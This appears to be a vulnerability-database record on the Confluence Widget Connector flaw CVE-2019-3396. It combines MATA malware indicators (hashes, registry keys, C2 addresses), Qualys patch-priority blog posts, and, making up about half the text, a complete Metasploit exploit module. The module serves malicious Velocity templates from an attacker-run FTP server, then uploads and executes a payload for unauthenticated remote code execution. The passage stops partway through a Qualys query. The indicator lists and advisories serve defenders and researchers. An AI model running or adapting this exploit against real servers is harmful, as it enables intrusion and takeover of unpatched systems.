\n455997E42E20C8256A494FA5556F7333 \n7ead1fbba01a76467d63c4a216cf2902 \n7d80175ea344b1c849ead7ca5a82ac94 \nbf2765175d6fce7069cdb164603bd7dc \nb5d85cfaece7da5ed20d8eb2c9fa477c \n6145fa69a6e42a0bf6a8f7c12005636b \n2b8ff2a971555390b37f75cb07ae84bd \n1e175231206cd7f80de4f6d86399c079 \n65632998063ff116417b04b65fdebdfb \nab2a98d3564c6bf656b8347681ecc2be \ne3dee2d65512b99a362a1dbf6726ba9c \nfea3a39f97c00a6c8a589ff48bcc5a8c \n2cd1f7f17153880fd80eba65b827d344 \n582b9801698c0c1614dbbae73c409efb \na64b3278cc8f8b75e3c86b6a1faa6686 \nca250f3c7a3098964a89d879333ac7c8 \ned5458de272171feee479c355ab4a9f3 \nf0e87707fd0462162e1aecb6b4a53a89 \nf1ca9c730c8b5169fe095d385bac77e7 \nf50a0cd229b7bf57fcbd67ccfa8a5147\n\n**Windows MATA**\n\nbea49839390e4f1eb3cb38d0fcaf897e rdata.dat \n8910bdaaa6d3d40e9f60523d3a34f914 sdata.dat \n6a066cf853fe51e3398ef773d016a4a8 \n228998f29864603fd4966cadd0be77fc \nda50a7a05abffb806f4a60c461521f41 \nec05817e19039c2f6cc2c021e2ea0016\n\n**Registry path**\n\nHKLM\\Software\\Microsoft\\KxtNet \nHKLM\\Software\\Microsoft\\HlqNet \nHKLM\\Software\\mthjk\n\n**Linux MATA**\n\n859e7e9a11b37d355955f85b9a305fec mdata.dat \n80c0efb9e129f7f9b05a783df6959812 ldata.dat, mdata.dat \nd2f94e178c254669fb9656d5513356d2 mdata.dat\n\n**Linux log collector**\n\n982bf527b9fe16205fea606d1beed7fa hdata.dat\n\n**Open-source Linux SoCat**\n\ne883bf5fd22eb6237eb84d80bbcf2ac9 sdata.dat\n\n**Script for exploiting Atlassian Confluence Server**\n\na99b7ef095f44cf35453465c64f0c70c check.vm, r.vm \n199b4c116ac14964e9646b2f27595156 r.vm\n\n**macOS MATA**\n\n81f8f0526740b55fe484c42126cd8396 TinkaOTP.dmg \nf05437d510287448325bac98a1378de1 SubMenu.nib\n\n### C2 address\n\n104.232.71.7:443 \n107.172.197.175:443 \n108.170.31.81:443 \n111.90.146.105:443 \n111.90.148.132:443 \n172.81.132.41:443 \n172.93.184.62:443 \n172.93.201.219:443 \n185.62.58.207:443 \n192.210.239.122:443 \n198.180.198.6:443 \n209.90.234.34:443 \n216.244.71.233:443 \n23.227.199.53:443 \n23.227.199.69:443 \n23.254.119.12:443 \n67.43.239.146:443 \n68.168.123.86:443", "modified": "2020-07-22T10:00:57", "published": "2020-07-22T10:00:57", "id": "SECURELIST:9C375DB331E2434EE824100A45629096", "href": "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "type": "securelist", "title": "MATA: Multi-platform targeted malware framework", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-04-19T23:54:15", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.", "edition": 1, "published": "2019-04-19T00:00:00", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": "1337DAY-ID-32569", "href": "https://0day.today/exploit/description/32569", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embed online videos, slideshows, photostreams and more directly into page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\r\n By default, Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles ftp RETP command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns a upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns checking template.\r\n #\r\n # @return [String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns Java's getting property template.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns dummy template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code to the template.\r\n #\r\n # @param service_url [String] Address of template to injection.\r\n # @return [void]\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n @command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target in Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Linux platform.\r\n #\r\n # @return [void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend\n\n# 0day.today [2019-04-19] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32569"}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n&quot;Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts,&quot; said the NSA advisory. It also recommended &quot;critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage.&quot;\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core &amp; Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: 